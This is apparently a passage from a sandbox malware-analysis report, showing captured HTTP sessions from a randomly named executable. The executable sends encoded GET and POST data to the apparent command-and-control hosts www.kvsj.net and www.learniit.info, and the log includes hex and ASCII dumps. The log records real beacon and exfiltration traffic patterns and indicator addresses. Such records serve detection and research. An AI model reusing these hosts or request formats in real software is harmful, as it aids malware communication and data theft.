                                                                                                            Data Ascii: x4=W87YeBucGxwNG/oo0Zys9f3FPIcduB5ZfNw3nasux/vGO49TfvnirbD28d5c8CA2CuneOJCgMV2HZXcAbNlaI9QbGV6a30vHUcUVyhmyNKMzJdKdzdUDlKmfkGsIrAuy9uODy7GBaUATX9vCOqHOeEcEPLhRg3PbuZVs8JcndxFCfHU9/xlrLm3NPU28iVPBaDgSATqYEygQjawJkJoolVUuO110ZxstBbyyZ+XTeKLdwdPjBd5ANzG17jqp2JDYU0jvbXRAk/QIPKzr3T0Zk6PczB6jXq7UUwIkeoaJRp5QV4gMYKY+6tJJVRId62nfzsrQ8IrrJCwJ2JmRBJZkzm5C8i0h05fYCMlCr3GLxlqzuj8DF/eOLpdfHbMu3T8rk7Tg2cwiZBz9Du8HnMczMab8d+MC7z+y+Un/1mJ9OMNqEGbJI/1ftP0nyvwqOVpavWVWc48rrm8H9X7Z5xoygLpN6vzP6I9Ja3PlMVMCRMWreOxfK+0Mx1BdViEmO8nk/lIkAz2+EwIwG65TXGRe4LK55WVyS+nHEFIPeSrFVUQlvkjn0/bB9B8NxESqfwPHkkKy01sAztJYdI+QW8Zmmg2Rt8KTqLR3ajypj99gtq4/X48tkQP5QQicgMFQs9S+ElqBzLBZGLwJP2tNYZLdNPd1Q64LBDMd1ODlU86bKNdVEWXoibs58p2FHoGSZ26XrdKay0+C5zTPHI7jtOPw46mV3IQhcfc0ltVmkdP4fVo5a1zQW+LH5far4lhN56Y0rKkW0RGBPnGw4bbES3n+bI0qrNU4AAZpyhYuRmwDTL9U5uA/NJNbF6WZRYr0zumQpHl4gjkzP2xvhAeuq+VpQmGBrvaOCLmZhA7cjLQ7F7VREbEBjcmOGiWaAUgiPXBkD/truGLRNpIwWnItYKqMYgTFzdjblHb3kLLHbFYDn/KESTxkfPvqfdQ8w+ez6N6vPsf+4a9EplsCjhAVgC/61MYLIEFAYPGAzwTEBhtgnJIOebyin [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:34.621628046 CET1746OUTData Raw: 53 6c 51 43 52 71 49 52 50 51 6d 6d 63 58 6b 52 63 42 30 4c 4e 73 62 49 76 38 54 5a 69 5a 66 72 52 56 30 70 45 44 6e 41 52 45 59 67 4a 75 56 52 41 6a 55 43 67 42 47 51 51 4c 4e 58 74 6d 2b 36 56 61 61 51 5a 74 39 67 74 34 74 38 41 75 4e 49 75 68
                                                                                                            Data Ascii: SlQCRqIRPQmmcXkRcB0LNsbIv8TZiZfrRV0pEDnAREYgJuVRAjUCgBGQQLNXtm+6VaaQZt9gt4t8AuNIuhJjvQDYjhmL5Fn8IOJ4x8zPTndWsVYA8CSk7rN4wuRjMNm+ba8dJ6hUjlB3T6ku3Phg3YDpY7iDJWmEyCrI/h4jfY8bMvZNNcS3S6MPn7VhqizrTGiIvhMdnKFeK9rWEVSZtfDCkb7hbg28dUSp79fMdFvQ6kvW+LT
                                                                                                            Dec 12, 2024 10:21:35.595786095 CET479INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:35 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.2249178173.236.199.97801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:37.157578945 CET537OUTGET /zu0o/?x4=b+T4d2yBdzwUctMejPOupP2kAcsd/nhPUeEaq4sP5cuMDP5lcr7xps31yZ0v/SBMA/DffJ2wWiPafQM+LvQwNtI7bwedqUnBbu8V9j+TNLUtBYOc7+oiqpinqR9T&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:21:38.255367994 CET479INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:38 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.2249179203.161.42.73801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:43.769907951 CET2472OUTPOST /n8su/ HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.learniit.info
                                                                                                            Referer: http://www.learniit.info/n8su/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 5a 4b 6b 6e 59 7a 37 44 48 56 34 71 6c 49 4a 68 6b 67 7a 4d 70 5a 46 64 6f 37 34 2b 7a 4b 4c 6a 41 30 65 44 44 36 6b 79 76 48 78 33 50 74 59 38 2f 42 49 7a 63 65 52 4e 76 51 58 4a 66 39 4f 4f 2b 76 6e 64 7a 47 43 71 43 39 38 42 72 6f 33 6a 61 34 5a 65 6e 6d 67 57 43 48 51 49 44 73 72 45 74 4e 4b 64 69 2b 72 63 41 52 66 6a 6a 36 50 59 4a 69 57 4b 5a 71 31 2f 54 2f 6a 4f 64 76 4b 64 37 6d 51 6a 78 62 55 33 50 72 4c 56 4d 4b 45 6d 79 4d 76 55 70 57 66 35 6a 71 78 57 52 2f 6d 79 73 77 2b 30 4c 42 41 32 7a 49 2f 4c 67 58 4c 55 79 42 55 2b 78 68 67 70 68 71 49 66 57 61 50 4c 4f 30 59 74 36 70 65 31 66 74 50 55 74 48 57 4c 50 66 39 30 69 36 65 6a 42 45 52 71 75 63 57 4d 59 77 47 5a 57 51 42 43 57 44 39 2b 66 70 43 6a 42 50 6b 51 47 4e 67 6a 32 55 41 78 76 31 4f 68 51 64 2b 58 2b 41 6c 32 64 33 54 52 5a 39 30 62 42 32 68 4a 52 59 77 74 5a 7a 34 62 6b 64 71 74 58 47 35 58 36 33 4c 65 4c 46 31 70 75 63 6b 6b 4d 6f 2f 38 42 6c 5a 63 44 4f 6d 78 5a 59 6f 68 53 53 4c [TRUNCATED]
                                                                                                            Data Ascii: x4=oH5aM1jkhdUjZKknYz7DHV4qlIJhkgzMpZFdo74+zKLjA0eDD6kyvHx3PtY8/BIzceRNvQXJf9OO+vndzGCqC98Bro3ja4ZenmgWCHQIDsrEtNKdi+rcARfjj6PYJiWKZq1/T/jOdvKd7mQjxbU3PrLVMKEmyMvUpWf5jqxWR/mysw+0LBA2zI/LgXLUyBU+xhgphqIfWaPLO0Yt6pe1ftPUtHWLPf90i6ejBERqucWMYwGZWQBCWD9+fpCjBPkQGNgj2UAxv1OhQd+X+Al2d3TRZ90bB2hJRYwtZz4bkdqtXG5X63LeLF1puckkMo/8BlZcDOmxZYohSSLStA4n8KaUxi9wF/AVRJm7qi9KpTo/bUszB5G6FryFtJKgjNrGNsebfl+vOEa6OfbTwzzxzeFwJfOy6NItSWsa+s3wPUyWBEzKSV3TenF+eVHAdwAIBn6Mzf7/W8pj6v/z1MhW7/JYkZ+RFA6YedmmPU6k3ZJc1r92TBnhVn5A4nTcF5s+SWfVXSrN5tkC5PHnlyH9AaU4raMi+ZPB/jqObZu4Pw3feUHVvBS/iVZLghoE3TyX3nzDY7loYMt5zq0Cp/tuTN+sKsM00El5szrq4mJEKR0gOL8LuNR0f8ZGuevxMPk+UQjWKQ1ws+ku8Y75kXGY2D0DlJV5xBhQDbqCyebW4uLjTqcJ3qNl3tCSAVpJCpoDZifAMWiVmdx2cojM9oap52JMIKI/0YTKt03belaxzL1h15mGiKK7rf2p2hukN4k2Ubh191iGDPcFL4nLKhyrnfgzQ4SvugAQSAg6tQjwYAz/9gFxwkYl8FrRcy+ImbCSttbQT4kiMQ3FWvKd5I+Q6A+2Dy7DIuS+5jmtsopMM00RMVpEJomVhFv5fS/+EiApQJ4q1npZv8T+kQi7sP8BZqKhVWhI6PQs4ei7Pqi2v3P30a1mo8ICeq7cwLkM7AKZX9PSaq7UWiIAibPdN9vW1JyAo6LKBYTQAfc59Muxjd2R9WONl [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:43.897783995 CET297OUTData Raw: 2b 56 4a 6e 58 2b 49 58 70 6a 57 35 65 38 4e 69 46 32 72 66 6d 30 59 48 2f 58 34 66 41 2b 41 68 6c 2b 4f 2f 72 2b 72 64 41 62 38 41 6c 74 65 46 30 33 63 79 2f 54 49 69 67 37 42 76 41 7a 45 6d 52 6a 42 59 4f 74 54 63 58 70 32 57 51 70 6e 30 42 5a
                                                                                                            Data Ascii: +VJnX+IXpjW5e8NiF2rfm0YH/X4fA+Ahl+O/r+rdAb8AlteF03cy/TIig7BvAzEmRjBYOtTcXp2WQpn0BZ32KPA0CIQVQSI+KKIPISvWL1WhmIPwTGNuacwuxWMbX4WKuYuNviIy3ACzif9JKmallDfVrRgudBKcFU0+XWdp3fEXIWiHXVBbTq9uW3jGhGjl5d9Dy93xiaCkWndjg+KxiMf8G6T0a/skB6MgU0at85qx640Hych
                                                                                                            Dec 12, 2024 10:21:44.996331930 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:44 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:44.996359110 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                            Dec 12, 2024 10:21:44.996376991 CET448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                                            Dec 12, 2024 10:21:44.996515036 CET1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                                                                            Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                                                                            Dec 12, 2024 10:21:44.996534109 CET1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                                                                            Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                                                                            Dec 12, 2024 10:21:44.996551991 CET448INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                                                                            Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                                                                            Dec 12, 2024 10:21:44.996654034 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                                            Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                                            Dec 12, 2024 10:21:44.996673107 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                                            Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                                            Dec 12, 2024 10:21:44.996691942 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                                            Dec 12, 2024 10:21:44.996711016 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                                            Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.2249180203.161.42.73801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:46.426131964 CET808OUTPOST /n8su/ HTTP/1.1
                                                                                                            Host: www.learniit.info
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.learniit.info
                                                                                                            Referer: http://www.learniit.info/n8su/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6f 48 35 61 4d 31 6a 6b 68 64 55 6a 5a 4e 51 6e 4b 78 44 44 48 31 34 71 6d 49 4a 68 2b 51 7a 77 70 5a 35 76 6f 2b 63 55 7a 35 62 6a 41 6c 75 44 43 50 49 79 75 48 78 30 45 4e 59 6e 38 78 49 44 63 65 51 69 76 53 44 4a 66 39 4b 4f 73 39 76 64 31 45 36 74 41 4e 38 50 6a 49 33 69 61 35 6c 54 6e 6d 63 47 43 48 34 49 44 71 54 45 72 39 61 64 79 73 44 63 51 78 66 35 6c 36 4f 51 4a 69 53 62 5a 72 46 33 54 2f 33 4f 64 64 2b 64 37 33 77 6a 31 4b 55 33 42 4c 4c 55 45 71 46 36 69 73 75 41 75 6c 7a 34 67 4d 4a 4b 51 74 53 6b 78 77 61 33 4e 51 6c 37 31 6f 2f 6d 67 79 4b 77 34 44 4d 36 6d 41 3d 3d
                                                                                                            Data Ascii: x4=oH5aM1jkhdUjZNQnKxDDH14qmIJh+QzwpZ5vo+cUz5bjAluDCPIyuHx0ENYn8xIDceQivSDJf9KOs9vd1E6tAN8PjI3ia5lTnmcGCH4IDqTEr9adysDcQxf5l6OQJiSbZrF3T/3Odd+d73wj1KU3BLLUEqF6isuAulz4gMJKQtSkxwa3NQl71o/mgyKw4DM6mA==
                                                                                                            Dec 12, 2024 10:21:47.642015934 CET1236INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:47 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 16052
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:47.642050982 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                                            Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                                            Dec 12, 2024 10:21:47.642087936 CET1236INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                                            Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
